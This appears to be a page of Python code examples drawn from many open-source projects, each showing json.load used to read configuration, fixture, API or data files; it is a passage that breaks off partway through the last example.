Code example #1
    def get_cur(self):
        types = ('alpha','beta','pre','rc',None,'p')
        version = self.base[0]
        if self.opts.version is not None:
            version = self.opts.version

        type = self.base[1]
        if self.opts.type == 'tagged':
            type = 4
            self.opts.hash = None
        elif self.opts.type is not None:
            type = types.index(self.opts.type)

        if self.opts.branch:
            self.branch = self.opts.branch
        elif type < 4:
            self.branch = 'master'
        else:
            self.branch = 'fixes/{0}'.format('.'.join(version.split('.')[0:2]))

        if type != 4:
            if self.opts.hash is None:
                commit = json.load(urllib.urlopen("https://api.github.com/repos/mythtv/MythTV/commits/" + urllib.quote(self.branch, '')))
                self.opts.hash = commit['sha']
                if self.opts.date is None:
                    self.opts.date = process_date(commit['commit']['committer']['date']).strftime('%Y%m%d')
                print "Autoselecting hash: "+self.opts.hash
            elif self.opts.date is None:
                commit = json.load(urllib.urlopen("https://api.github.com/repos/mythtv/MythTV/commits/" + self.opts.hash))
                self.opts.date = process_date(commit['commit']['committer']['date']).strftime('%Y%m%d')

        self.cur = (version, type, self.opts.date)
        if self.opts.verbose: print 'New version set to: {0}-{1}'.format(self.name,self.get_version(self.cur))
Code example #2
 def test_init_manifest_packageid(self):
     comm.setUp()
     os.chdir(comm.XwalkPath)
     comm.clear("org.xwalk.test")
     os.mkdir("org.xwalk.test")
     cmd = (
         comm.HOST_PREFIX
         + comm.PackTools
         + "crosswalk-app manifest "
         + comm.XwalkPath
         + "org.xwalk.test --platforms=android --package-id=org.xwalk.test"
     )
     os.system(cmd)
     with open(comm.ConstPath + "/../tools/org.xwalk.test/manifest.json") as json_file:
         data = json.load(json_file)
     updatecmd = (
         comm.HOST_PREFIX
         + comm.PackTools
         + "crosswalk-app manifest "
         + comm.XwalkPath
         + "org.xwalk.test --platforms=android --package-id=org.test.foo"
     )
     os.system(updatecmd)
     with open(comm.ConstPath + "/../tools/org.xwalk.test/manifest.json") as json_file_update:
         updatedata = json.load(json_file_update)
     comm.clear("org.xwalk.test")
     self.assertEquals(data["xwalk_package_id"].strip(os.linesep), "org.xwalk.test")
     self.assertEquals(updatedata["xwalk_package_id"].strip(os.linesep), "org.test.foo")
Code example #3
File: config.py Project: WellDone/pymomo
	def __init__(self, name, require_local=False):
		localpath = os.path.join(conf_dir, name +'.local.json')
		globalpath = os.path.join(conf_dir, name + '.global.json')

		conf = {}
		localconf = None
		try:
			with open(globalpath, 'r') as f:
				conf = json.load(f)
		except IOError:
			pass  # it's fine if the global file doesn't exist

		try:
			with open(localpath, 'r') as f:
				localconf = json.load(f)
		except IOError:
			if require_local:
				raise ValueError('Local settings file does not exist and is required: %s' % name +'.local.json')

		if localconf is not None:
			merge_dicts(conf, localconf)

		self.conf = conf
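
The `merge_dicts` helper called above is defined elsewhere in the pymomo package and is not shown here. As a rough sketch, assuming it performs a recursive merge in which local values override global ones, it could look like the following (illustration only, not the project's actual implementation):

def merge_dicts(base, overrides):
    # Fold `overrides` into `base` recursively; on a conflict the override wins.
    for key, value in overrides.items():
        if isinstance(value, dict) and isinstance(base.get(key), dict):
            merge_dicts(base[key], value)
        else:
            base[key] = value
    return base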
Code example #4
 def upload_fixture_image(
     self, fixture_image_path,
     verification_stats_path, verification_result_path, headline='test'
 ):
     with self.app.app_context():
         with open(fixture_image_path, mode='rb') as f:
             file_name = ntpath.basename(fixture_image_path)
             file_type = 'image'
             content_type = '%s/%s' % (file_type, imghdr.what(f))
             file_id = app.media.put(
                 f, filename=file_name,
                 content_type=content_type,
                 resource=get_resource_service('ingest').datasource,
                 metadata={}
             )
             inserted = [file_id]
             renditions = generate_renditions(
                 f, file_id, inserted, file_type, content_type,
                 rendition_config=config.RENDITIONS['picture'],
                 url_for_media=url_for_media
             )
         data = [{
             'headline': headline,
             'slugline': 'rebuild',
             'renditions': renditions,
             'type': 'picture'
         }]
         image_id = get_resource_service('ingest').post(data)
     with open(verification_result_path, 'r') as f:
         self.expected_verification_results.append(json.load(f))
     with open(verification_stats_path, 'r') as f:
         self.expected_verification_stats.append(json.load(f))
     return image_id
Code example #5
    def saveList(self):
        nameOfList = self.LNEDTlistName.text()
        restsOfEachDay = self.collect_restaurants()
        foods = self.collect_foods()
        pyJson = {}
        pyJson["version"]=self.form_data_version
        pyJson["restsOfEachDay"] = restsOfEachDay
        pyJson["foods"] = foods
        # write json file
        json_file = json.dumps(pyJson)
        file = open('./foodlists/' + nameOfList + '.json', 'w')
        file.write(json_file)  #write database to file
        file.close()

        json_file = open('./foodlists/' + nameOfList + ".json", "r")
        json_decoded = json.load(json_file)
        json_file.close()

        datas_file = open('./data/_lisnamedata', "r+")
        datas_decoded = json.load(datas_file)
        if nameOfList.upper() not in (name.upper() for name in datas_decoded["listNames"]):
            datas_decoded["listNames"].append(nameOfList)
            # self.CMBXlists.addItem(nameOfList)
            # self.CMBXeditLists.addItem(nameOfList)

        datas_file.seek(0, 0)  # go to beginning of file
        datas_file.write(json.dumps(datas_decoded))
        datas_file.close()
        self.fill_list_of_listname()
        self.showInfoMessage(u" لیست جدید",nameOfList+u" ذخیره شد ")  # Persian UI strings: title "New list", message "<name> was saved"
Code example #6
File: rtk_trans.py Project: bssthu/rtk_trans
    def load_config(self):
        """载入配置文件

        先读入 conf/config.json 中的配置,再读入 conf/ 中其他 json 文件里的 entry
        """
        config_dir = os.path.join(sys.path[0], 'conf')
        configs = {}
        # main config
        config_file_name = os.path.join(config_dir, 'config.json')
        try:
            with open(config_file_name) as config_fp:
                configs = json.load(config_fp)
        except Exception as e:
            log.error('main: failed to load config from conf/config.json: %s' % e)
        if 'entry' not in configs.keys():
            configs['entry'] = {}

        # other entries
        for dir_path, dir_names, file_names in os.walk(config_dir):
            for file_name in file_names:
                if file_name != 'config.json' and file_name.endswith('.json'):
                    # load sub config
                    config_file_name = os.path.join(config_dir, file_name)
                    try:
                        with open(config_file_name) as config_fp:
                            sub_configs = json.load(config_fp)
                        # insert into main config
                        for name, config in sorted(sub_configs['entry'].items()):
                            if name not in configs['entry'].keys():
                                configs['entry'][name] = config
                    except Exception as e:
                        log.error('main: failed to load config from conf/%s: %s' % (file_name, e))

        return configs
Code example #7
def get_proportional_hash_area(period):
	""" 	Takes in periods accepted by P2Pool - hour, day, week, month or year,
		then gets hash_data from the server running on localhost, parses it, 
		and calculates each miner's hash power against the total during that time. 
	"""
	import urllib2, json
	path1 = 'http://localhost:9332/web/graph_data/miner_hash_rates/last_'+period
	result1 = json.load(urllib2.urlopen(path1))
	path2 = 'http://localhost:9332/web/graph_data/miner_dead_hash_rates/last_'+period
	result2 = json.load(urllib2.urlopen(path2))
	
	hash_areas = {}
	total_hash_area = 0
	for row in result1:
		for address in row[1]:
			try:
				hash_areas[address] += row[1][address] * row[2]
			except KeyError:
				hash_areas[address] = row[1][address] * row[2]
			finally:
				total_hash_area += row[1][address] * row[2]
	
	for row in result2:
		for address in row[1]:
			hash_areas[address] -= row[1][address]*row[2]
			total_hash_area -= row[1][address] * row[2]

	proportions = {}	
	for address in hash_areas.keys():
		proportions[address] = hash_areas[address] / total_hash_area
		hash_areas[address] /= 1000000000000000
	
	return hash_areas, proportions
Code example #8
File: views.py Project: LinDA-tools/LindaWorkbench
def install_vocabularies():
    Vocabulary.objects.all().delete()
    VocabularyClass.objects.all().delete()
    VocabularyProperty.objects.all().delete()

    # load vocabularies
    vocabularies_fp = open(os.path.join(os.path.dirname(__file__), 'data/vocabularies.json'))
    data = json.load(vocabularies_fp)
    n_of_vocabularies = 0
    with transaction.atomic():  # atomic transactions vastly improve performance
        for v in data:
            vocabulary = Vocabulary.objects.create(pk=v['pk'], category=v['fields']['category'],
                                                   version=v['fields']['version'], votes=v['fields']['votes'],
                                                   originalUrl=v['fields']['originalUrl'],
                                                   description=v['fields']['description'], title=v['fields']['title'],
                                                   downloads=v['fields']['downloads'],
                                                   lodRanking=v['fields']['lodRanking'],
                                                   preferredNamespacePrefix=v['fields']['preferredNamespacePrefix'],
                                                   datePublished=v['fields']['datePublished'],
                                                   downloadUrl=v['fields']['downloadUrl'], score=v['fields']['score'],
                                                   uploader=User.objects.get(pk=v['fields']['uploader']),
                                                   dateModified=v['fields']['dateModified'],
                                                   dateCreated=v['fields']['dateCreated'],
                                                   preferredNamespaceUri=v['fields']['preferredNamespaceUri'],
                                                   example=v['fields']['example'], prevent_default_make=True)
            n_of_vocabularies += 1
            vocabulary.prevent_default_make = False  # reset to false so it can be updated
    vocabularies_fp.close()

    # load classes
    classes_fp = open(os.path.join(os.path.dirname(__file__), 'data/classes.json'))
    data = json.load(classes_fp)
    n_of_classes = 0
    with transaction.atomic():
        for c in data:
            VocabularyClass.objects.create(pk=c['pk'], description=c['fields']['description'],
                                           uri=c['fields']['uri'], label=c['fields']['label'],
                                           vocabulary=Vocabulary.objects.get(pk=c['fields']['vocabulary']))
            n_of_classes += 1
    classes_fp.close()

    # load properties
    properties_fp = open(os.path.join(os.path.dirname(__file__), 'data/properties.json'))
    data = json.load(properties_fp)
    n_of_properties = 0
    with transaction.atomic():
        for p in data:
            VocabularyProperty.objects.create(pk=p['pk'], description=p['fields']['description'],
                                              uri=p['fields']['uri'],
                                              vocabulary=Vocabulary.objects.get(pk=p['fields']['vocabulary']),
                                              label=p['fields']['label'], domain=p['fields']['domain'],
                                              range=p['fields']['range'], parent_uri=p['fields']['parent_uri'])
            n_of_properties += 1
    properties_fp.close()

    return HttpResponse(json.dumps({
        'n_of_vocabularies': n_of_vocabularies,
        'n_of_classes': n_of_classes,
        'n_of_properties': n_of_properties
    }), status=200, content_type="application/json")
Code example #9
def main(we_file, w2i_file, sen):
    cc_matrix = "./input/cc_matrix.npy"
    if not os.path.isfile(w2i_file):
        sentences, word2idx = get_reuters_data(n_vocab=2000)
        with open(w2i_file, 'w') as f:
            json.dump(word2idx, f)
        with open(sen, 'w') as f:
            json.dump(sentences, f)
    else:
        with open(w2i_file) as data_file:    
            word2idx = json.load(data_file)
        with open(sen) as data_file:    
            sentences = json.load(data_file)

    V = len(word2idx)
    model = Glove(50, V, 10)
    # model.fit(sentences, cc_matrix=cc_matrix, epochs=20) # ALS
    model.fit(
        sentences,
        cc_matrix=cc_matrix,
        learning_rate=3*10e-5,
        reg=0.01,
        epochs=2000,
        gd=True,
        use_theano=True
    ) # gradient descent
    model.save(we_file)
Code example #10
def ReadJson(config_file):
    """Read in a JSON configuration file and return the corresponding dicts.

    A JSON file only defines a single dict.  However to be parallel to the functionality of
    ReadYaml, the output is a list with a single item, which is the dict defined by the JSON file.

    @param config_file      The name of the configuration file to read.

    @returns [config_dict]
    """
    import json

    with open(config_file) as f:
        try:
            # cf. http://stackoverflow.com/questions/6921699/can-i-get-json-to-load-into-an-ordereddict-in-python
            config = json.load(f, object_pairs_hook=OrderedDict)
        except TypeError:  # pragma: no cover
            # for python2.6, json doesn't come with the object_pairs_hook, so
            # try using simplejson, and if that doesn't work, just use a regular dict.
            # Also, it seems that if the above line raises an exception, the file handle
            # is not left at the beginning, so seek back to 0.
            f.seek(0)
            try:
                import simplejson
                config = simplejson.load(f, object_pairs_hook=OrderedDict)
            except ImportError:
                config = json.load(f)

    # JSON files only ever define a single job, but we need to return a list with this one item.
    return [config]
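
The `object_pairs_hook=OrderedDict` argument used above is part of the standard-library `json` module and is what preserves the key order found in the file. A small self-contained check of that behaviour (not part of the `ReadJson` function itself):

import json
from collections import OrderedDict

text = '{"b": 1, "a": 2, "c": 3}'
ordered = json.loads(text, object_pairs_hook=OrderedDict)
assert list(ordered.keys()) == ['b', 'a', 'c']  # keys come back in file order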
Code example #11
File: views.py Project: LinDA-tools/LindaWorkbench
def install_analytics():
    Category.objects.all().delete()
    Algorithm.objects.all().delete()

    # load categories
    categories_fp = open(os.path.join(os.path.dirname(__file__), 'data/categories.json'))
    data = json.load(categories_fp)
    n_of_categories = 0
    for c in data:
        Category.objects.create(pk=c['pk'], name=c['fields']['name'],
                                description=c['fields']['description'])
        n_of_categories += 1

    categories_fp.close()

    # load algorithms
    algorithms_fp = open(os.path.join(os.path.dirname(__file__), 'data/algorithms.json'))
    data = json.load(algorithms_fp)
    n_of_algorithms = 0
    for a in data:
        Algorithm.objects.create(pk=a['pk'],
                                 category=Category.objects.get(pk=a['fields']['category']),
                                 name=a['fields']['name'], description=a['fields']['description'])
        n_of_algorithms += 1

    algorithms_fp.close()

    return HttpResponse(json.dumps({
        'n_of_categories': n_of_categories,
        'n_of_algorithms': n_of_algorithms
        }), status=200, content_type="application/json")
Code example #12
File: views.py Project: ychsieh/Actually
def getcommits_from_project(project):
    global access_token
    url1 = 'https://api.github.com/user'
    request1=Request(url1)
    request1.add_header('Authorization', 'token %s' % access_token)
    response1 = urlopen(request1)
    result1 = json.load(response1)
    person = result1['login']
    repo_info=['Fasta','js2839']
    owner= repo_info[1]
    repo = repo_info[0]
    url = 'https://api.github.com/repos/'+owner+'/'+repo+'/commits'
    data=[]
    request = Request(url)
    request.add_header('Authorization', 'token %s' % access_token)
    response = urlopen(request)
    result = json.load(response)
    for i in range(len(result)):
        print 'result0'
        data.append([result[i]['commit']['message'], result[i]['commit']['author']['name'], result[i]['commit']['author']['date']])
        print data[i]
    for com in data:
        (per,sub_name)=getPercentage(com[0])
        err = save_to_db( per, sub_name, com[1], project, com[2])
    return 
Code example #13
File: streams.py Project: poseidon1214/PyFunctional
    def json(self, json_file):
        """
        Reads and parses the input of a json file handler or file.

        Json files are parsed differently depending on if the root is a dictionary or an array.

        1) If the json's root is a dictionary, these are parsed into a sequence of (Key, Value)
        pairs

        2) If the json's root is an array, these are parsed into a sequence
        of entries

        >>> seq.json('examples/users.json').first()
        [u'sarah', {u'date_created': u'08/08', u'news_email': True, u'email': u'*****@*****.**'}]

        :param json_file: path or file containing json content
        :return: Sequence wrapping the json file
        """
        if isinstance(json_file, str):
            file_open = get_read_function(json_file, self.disable_compression)
            input_file = file_open(json_file)
            json_input = jsonapi.load(input_file)
        elif hasattr(json_file, 'read'):
            json_input = jsonapi.load(json_file)
        else:
            raise ValueError('json_file must be a file path or implement the iterator interface')

        if isinstance(json_input, list):
            return self(json_input)
        else:
            return self(six.viewitems(json_input))
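
The dict-root versus array-root rule described in the docstring can be illustrated with the standard library alone; the helper below is purely illustrative and is not part of PyFunctional:

import json

def parse_json_root(text):
    # Mirror the documented behaviour: a dict root yields (key, value) pairs,
    # an array root yields its entries as-is.
    data = json.loads(text)
    return list(data.items()) if isinstance(data, dict) else data

parse_json_root('{"sarah": {"news_email": true}}')  # [('sarah', {'news_email': True})]
parse_json_root('[1, 2, 3]')                        # [1, 2, 3]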
Code example #14
def populate_recipe_tables():  # pylint: disable=too-many-locals
    """Populate tables about recipes."""
    # Get all plans and recipes
    with open(JsonRes.craftplan, 'r', encoding='UTF-8') as f_recipes:
        recipes = json.load(f_recipes)

    with open(JsonRes.plans_en, 'r', encoding='UTF-8') as f_plans:
        plans = flatten_nested_dict(json.load(f_plans))

    for recipe, component in recipes.items():
        # filter Matis-affiliated recipes to get the higher quality recipe
        if recipe[:3] == 'bcf':
            recipe = recipe.replace('bcf', 'bcc')

        # Filter recipes to keep only those that are not affiliated to a faction
        if recipe[:3] != 'bcc' and recipe[:4] != 'bcmj':
            continue

        quality = get_plan_quality(recipe)

        try:
            # Split the recipe code to separate the quality code from the rest
            # pylint: disable=unpacking-non-sequence
            keypath, infos = get_plan(plans, recipe.split('_')[0])
        except TypeError:
            print(
                "The recipe code: {} was not found in the ".format(recipe) +
                "flatten dict of plans.",
                file=sys.stderr
            )
            continue

        *categories, recipe_name = keypath.split("|")

        if "ammo" in recipe_name:
            # recipe_name += " of " + categories[-1].lower()
            recipe_name = categories[-1] + " " + recipe_name.lower()
            categories[-1] = None

        if categories[0] == "Weapon":
            if "One" in categories[-1]:
                categories[-1] = 1
            elif "Two" in categories[-1] or "hand" in categories[-1]:
                categories[-1] = 2
            else:
                categories[-1] = None

        recipe_cat_id = insert_recipe_category(*categories)

        recipe_id = insert_recipe(
            recipe_name, quality, infos['icon'] + '.png', recipe_cat_id
        )

        # Recipe already exists
        if recipe_id == 'stop':
            continue

        # Loop over plan's component
        for comp, amount in component['mpft'].items():
            insert_recipe_component(recipe_id, comp, amount)
Code example #15
 def getJSON(self, name):
   file_name = os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "data", name + ".json")
   try:
     self.json_data = json.load(open(file_name, 'r'))
   except IOError:
     # Data file is missing: run the helper script to (re)generate it, then retry the load.
     # Passing the argument list without shell=True ensures file_name actually reaches the script.
     subprocess.call(["./get_residue.sh", file_name])
     self.json_data = json.load(open(file_name, 'r'))
Code example #16
File: npm.py Project: michaelgwood/poky
    def download(self, ud, d):
        """Fetch url"""
        jsondepobj = {}
        shrinkobj = {}
        lockdown = {}

        if not os.listdir(ud.pkgdatadir) and os.path.exists(ud.fullmirror):
            dest = d.getVar("DL_DIR", True)
            bb.utils.mkdirhier(dest)
            runfetchcmd("tar -xJf %s" % (ud.fullmirror), d, workdir=dest)
            return

        shwrf = d.getVar('NPM_SHRINKWRAP', True)
        logger.debug(2, "NPM shrinkwrap file is %s" % shwrf)
        try:
            with open(shwrf) as datafile:
                shrinkobj = json.load(datafile)
        except:
            logger.warning('Missing shrinkwrap file in NPM_SHRINKWRAP for %s, this will lead to unreliable builds!' % ud.pkgname)
        lckdf = d.getVar('NPM_LOCKDOWN', True)
        logger.debug(2, "NPM lockdown file is %s" % lckdf)
        try:
            with open(lckdf) as datafile:
                lockdown = json.load(datafile)
        except:
            logger.warning('Missing lockdown file in NPM_LOCKDOWN for %s, this will lead to unreproducible builds!' % ud.pkgname)

        if ('name' not in shrinkobj):
            self._getdependencies(ud.pkgname, jsondepobj, ud.version, d, ud)
        else:
            self._getshrinkeddependencies(ud.pkgname, shrinkobj, ud.version, d, ud, lockdown, jsondepobj)

        with open(ud.localpath, 'w') as outfile:
            json.dump(jsondepobj, outfile)
Code example #17
def merge_data_from_crawl():  # TODO: refactor, this function is far too long
    category_file = sorted(os.listdir(os.getcwd()+"/data/data_from_crawl"))
    movies_category = [file_name for file_name in category_file if not any(c.isdigit() for c in file_name)]
    for category in movies_category:
        if category.endswith('.json'):
            category = category[:-5]
        if category.endswith('die'):
            movies_with_part = [file_name for file_name in category_file if (len(file_name) < 30 and category in file_name)]
        else:
            movies_with_part = [file_name for file_name in category_file if category in file_name]
        if len(movies_with_part) > 1:
            all_part_data = {}
            for movies_part in movies_with_part:
                with open('data/data_from_crawl/' + movies_part) as part:
                    data = json.load(part)
                for movie_title, movie_data in data.iteritems():
                    all_part_data[movie_title] = movie_data
            with io.open("data/data_to_use/" + movies_with_part[0] , "w+", encoding='utf8') as all_part:
                output = json.dumps(all_part_data, ensure_ascii=False, encoding='utf8')
                all_part.write(unicode(output))
        if len(movies_with_part) == 1 and movies_with_part[0][0] != '.':
            with open('data/data_from_crawl/' + movies_with_part[0]) as part:
                data = json.load(part)
            with io.open("data/data_to_use/" + movies_with_part[0] , "w+", encoding='utf8') as all_part:
                output = json.dumps(data, ensure_ascii=False, encoding='utf8')
                all_part.write(unicode(output))
Code example #18
File: test_views.py Project: texastribune/wjordpress
    def test_post_works(self):
        site = WPSiteFactory(url='http://www.foo.com/')
        # assert the post we're about to make doesn't exist
        self.assertFalse(WPPost.objects.filter(wp=site, id=521).exists())
        # sample POST based on a RequestBin[requestb.in] test
        request = self.factory.post('/foo/', {
            'hook': 'save_post',
            'ID': '521',
            'guid': 'http://www.foo.com/?p=521',
        })
        data = json.load(open(os.path.join(BASE_DIR, 'support', 'posts_521.json')))
        with mock.patch('wjordpress.models.WPApi') as MockApi:
            # got to be a better syntax for this
            MockApi.return_value = mock.MagicMock(**{'posts.return_value': data})
            response = self.view.post(request, site.pk)
        self.assertEqual(response.status_code, 200)
        # assert this post now exists
        self.assertTrue(WPPost.objects.filter(wp=site, id=521).exists())
        post = WPPost.objects.filter(wp=site, id=521).get()
        self.assertTrue(post.author)

        # Contrived example: author changes locally, will it get set again?
        post.author = None
        post.save()

        data = json.load(open(os.path.join(BASE_DIR, 'support', 'posts_521.json')))
        with mock.patch('wjordpress.models.WPApi') as MockApi:
            # got to be a better syntax for this
            MockApi.return_value = mock.MagicMock(**{'posts.return_value': data})
            response = self.view.post(request, site.pk)
        # sanity check
        self.assertEqual(response.status_code, 200)
        post = WPPost.objects.filter(wp=site, id=521).get()
        # assert foreign relations were created
        self.assertTrue(post.author)
Code example #19
File: generator.py Project: 0xmohit/rust
def main():
    args = parse_args()
    ins = args.in_
    out = args.out
    out_format = FORMATS[args.format]
    info = args.info
    one_file_no_info = False
    if len(ins) > 1 and info is None:
        print('error: cannot have multiple inputs without an info header.', file=sys.stderr)
        sys.exit(1)

    elif info is None:
        info = ins[0]
        one_file_no_info = True
    info_json = json.load(info)
    platform = PlatformInfo(info_json)

    print(out_format.open(platform), file=out)

    for in_ in ins:

        if one_file_no_info:
            data = info_json
        else:
            data = json.load(in_)
            data.update(info_json)

        intrinsics = IntrinsicSet(platform, data)
        for intr in intrinsics.intrinsics():
            for mono in intr.monomorphise():
                print(out_format.render(mono), file=out)

    print(out_format.close(), file=out)
Code example #20
def crash_recover():
	global crash_obj
	tidy_reset=0
	try:
		with open(crash_file):
			print "recovering from %s" % crash_file
			crash_json=open(crash_file)
			crash_progress=json.load(crash_json)
			tidy_reset=1
			pass
	except IOError:	
		print "no crash log found.  Executing as normal"
		
		pass
	
	if tidy_reset:
		print "\tRestoring progress"
		crash_json = open(crash_file)
		crash_obj=json.load(crash_json)
	else:
		validate_delete = raw_input("Delete all entries to %s in %s.%s?  (Y/N)" % (start_date,db_schema,db_name))
		if validate_delete.upper() == 'Y':
			db_cursor.execute("DELETE FROM %s WHERE date>='%s'" % (db_name,start_date))
			db.commit()
			print "\tCleaning up ALL entries to %s" % start_date
		else:
			print "\tWARNING: values may be wrong without scrubbing duplicates"
		#Initialize crash_obj
		crash_obj={}
		crash_obj["parsed_data"]={}
		crash_obj["progress"]={}
Code example #21
def do_environment_model_edit(mc, args):
    """Edit an environment's object model."""
    jp_obj = None
    if not args.filename:
        jp_obj = json.load(sys.stdin)
    else:
        with open(args.filename) as fpatch:
            jp_obj = json.load(fpatch)

    if not isinstance(jp_obj, list):
        raise exceptions.CommandError('JSON-patch must be a list of changes')
    for change in jp_obj:
        if 'op' not in change or 'path' not in change:
            raise exceptions.CommandError('Every change in JSON-patch must '
                                          'contain "op" and "path" keys')
        op = change['op']
        if op not in ['add', 'replace', 'remove']:
            raise exceptions.CommandError('The value of "op" item must be '
                                          '"add", "replace" or "remove", '
                                          'got {0}'.format(op))
        if op != 'remove' and 'value' not in change:
            raise exceptions.CommandError('"add" or "replace" change in '
                                          'JSON-patch must contain "value" '
                                          'key')
    session_id = args.session_id
    new_model = mc.environments.update_model(args.id, jp_obj, session_id)
    print(utils.json_formatter(new_model))
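
For reference, a document that passes the validation above is a list of changes in which every item carries "op" and "path", and every non-"remove" item also carries "value". The paths below are illustrative only, not real Murano object-model paths:

example_patch = [
    {"op": "replace", "path": "/name", "value": "renamed-environment"},
    {"op": "add", "path": "/services/0/label", "value": "web-tier"},
    {"op": "remove", "path": "/services/1"},
]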
Code example #22
 def test_stop_replication(self):
   utils.debug("===========test_stop_replication=========")
   utils.run_vtctl('ChangeSlaveType test_nj-0000062345 replica')
   time.sleep(10)
   perform_insert(100)
   master_position = utils.mysql_query(62344, 'vt_test_keyspace', 'show master status')
   #The sleep is needed here, so the invalidator can catch up and the number can be tested.
   replica_tablet.mquery('vt_test_keyspace', "select MASTER_POS_WAIT('%s', %d)" % (master_position[0][0], master_position[0][1]), 5)
   time.sleep(5)
   inv_count1 = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['Totals']['Invalidations']
   replica_tablet.mquery('vt_test_keyspace', "stop slave")
   perform_insert(100)
   # EOF is returned after 30s, sleeping a bit more to ensure we catch the EOF
   # and can test replication stop effectively.
   time.sleep(35)
   replica_tablet.mquery('vt_test_keyspace', "start slave")
   master_position = utils.mysql_query(62344, 'vt_test_keyspace', 'show master status')
   #The sleep is needed here, so the invalidator can catch up and the number can be tested.
   replica_tablet.mquery('vt_test_keyspace', "select MASTER_POS_WAIT('%s', %d)" % (master_position[0][0], master_position[0][1]), 5)
   time.sleep(10)
   invalidatorStats = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/vars" % replica_host)))['CacheInvalidationProcessor']
   utils.debug("invalidatorStats %s" % invalidatorStats)
   inv_count2 = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['Totals']['Invalidations']
   utils.debug("invalidator count1 %d count2 %d" % (inv_count1, inv_count2))
   self.assertEqual(invalidatorStats["States"]["Current"], "Enabled", "Row-cache invalidator should be enabled")
   self.assertTrue(inv_count2 - inv_count1 > 0, "invalidator was able to restart after a small pause in replication")
Code example #23
File: __main__.py Project: TrainingB/RotomDex
def load_config():
    global config
    global pkmn_info
    global type_chart
    global type_list
    global raid_info
    global egg_timer
    global raid_timer
    global icon_list
    global GOOGLE_API_KEY
    global GOOGLE_MAPS_URL

    # Load configuration
    with open("config.json", "r") as fd:
        config = json.load(fd)

    # Set up message catalog access
    # language = gettext.translation('clembot', localedir='locale', languages="en")
    # language.install()
    # pokemon_language = [config['pokemon-language']]
    # pokemon_path_source = os.path.join('locale', '{0}', 'pkmn.json').format(config['pokemon-language'])

    # Load Pokemon list and raid info
    with open(os.path.join('data', 'pkmn.json'), "r") as fd:
        pkmn_info = json.load(fd)

    with open(os.path.join('data', "icon.json"), "r") as fd:
        icon_list = json.load(fd)

    # Set spelling dictionary to our list of Pokemon
    spelling.set_dictionary(pkmn_info['pokemon_list'])
Code example #24
    def load_data(self):
        logging.info("Starting data loads.")
        self.data = json.load(open('data/features.json'))
        helpers.normalize_features(self.data)

        self.dev_movie_ids = set(json.load(open('data/dev.json')))
        self.test_movie_ids = set(json.load(open('data/test.json')))

        # self.data = dict((k,self.data[unicode(k)]) for k in (list(self.dev_movie_ids)[0:900] + list(self.test_movie_ids)[0:100]))

        # Transforms the data so they can be used by pybrain.
        logging.info("Loading feature keys...")
        feature_keys = set()
        for movie_id, features in self.data.iteritems():
            feature_keys.update(features['features'].keys())

        self.feature_keys = list(feature_keys)
        logging.info("Feature keys loaded.")

        logging.info("Vectorizing features...")
        self.dev_features = []
        self.dev_scores = []
        self.test_features = []
        self.test_scores = []
        for movie_id, features in self.data.iteritems():
            if int(movie_id) in self.dev_movie_ids:
                features_list = self.dev_features
                scores_list = self.dev_scores
            else:
                features_list = self.test_features
                scores_list = self.test_scores

            features_list.append([features['features'].get(feature_key, 0) for feature_key in self.feature_keys])
            scores_list.append([features['rating']])
        logging.info("Features vectorized.")
Code example #25
 def get_first_image_specific_implementation(self, species, index):
     #returns the url of the first image of the species found in the source
     (return_status, ids) = self.get_ids(species)
     
     if not(return_status):
         self.err_list[index] = (species, ids)
         return
     else:
         id = ids[0]
         url = 'http://eol.org/api/pages/1.0/' + str(id) + '.json?images=10&videos=0&sounds=0&maps=0&text=0&iucn=false&subjects=overview&licenses=all&details=false&common_names='
         
         data_pages = ''
         
         i = 0
         while True:
             try:
                 data_pages = json.load(urllib2.urlopen(url))
                 break
             except URLError:
                 if i < 3:
                     i = i + 1
                 else:
                     self.err_list[index] = (species, constants.CONNECTION_ERROR)
                     return
             except:
                 self.err_list[index] = (species, constants.JSON_ERROR)
                 return
         
         pages_list = data_pages['dataObjects']
         
         if len(pages_list) == 0:
             self.err_list[index] = (species, constants.NO_IMAGES_FOR_SPECIES)
             return
         else:
             object_id = pages_list[0]['dataObjectVersionID']
             url = 'http://eol.org/api/data_objects/1.0/' + str(object_id) + '.json'
             
             image_list = ''
             i = 0
             
             while True:
                 try:
                     image_list = json.load(urllib2.urlopen(url))['dataObjects']
                     break
                 except URLError:
                     if i < 3:
                         i = i + 1
                     else:
                         self.err_list[index] = (species, constants.CONNECTION_ERROR)
                         return
                 except:
                     self.err_list[index] = (species, constants.JSON_ERROR)
                     return
             
             if len(image_list) == 0:
                 self.err_list[index] = (species, constants.NO_IMAGES_FOR_SPECIES)
                 return
             else:
                 self.img_list[index] = (species, image_list[0]['mediaURL'])
                 return
Code example #26
File: utils.py Project: mralexgray/Sublime-Text-3
def get_jscs_options(path):
    option_sets = []

    jscsrc_path = findup(path, '.jscsrc')
    if os.path.isfile(jscsrc_path):
        jscsrc = lazy_parse_comment_json(
            open(jscsrc_path, 'r', encoding='UTF-8'))
        option_sets.append((jscsrc_path, jscsrc))

    jscs_json_path = findup(path, '.jscs.json')
    if os.path.isfile(jscs_json_path):
        jscs_json = json.load(open(jscs_json_path, 'r', encoding='UTF-8'))
        option_sets.append((jscs_json_path, jscs_json))

    package_path = findup(path, 'package.json')
    if os.path.isfile(package_path):
        package = json.load(open(package_path, 'r', encoding='UTF-8'))
        if 'jscsConfig' in package:
            option_sets.append((package_path, package['jscsConfig']))

    # Sort sets by dirname length
    option_sets.sort(key=lambda x: len(os.path.dirname(x[0])))

    # Merge options together
    options = dict()
    for path, option_set in option_sets:
        options.update(option_set)

    return options
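
`findup` and `lazy_parse_comment_json` are helpers defined elsewhere in the plugin and are not shown. Assuming `findup` walks upward from `path` and returns the first matching file (or an empty string, so the `os.path.isfile` checks above simply fail), a rough sketch might be:

import os

def findup(path, filename):
    current = os.path.abspath(path)
    while True:
        candidate = os.path.join(current, filename)
        if os.path.isfile(candidate):
            return candidate
        parent = os.path.dirname(current)
        if parent == current:  # reached the filesystem root without a match
            return ''
        current = parent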
Code example #27
def dynamic_params_from_model(model):
    '''Get user-submitted dynamic parameters from a DynamicSaveInputs model'''
    ser_model = serializers.serialize('json', [model])
    user_inputs = json.loads(ser_model)
    inputs = user_inputs[0]['fields']

    # Read user-modifiable parameters list from file
    usermods_path = os.path.join(os.path.split(__file__)[0],
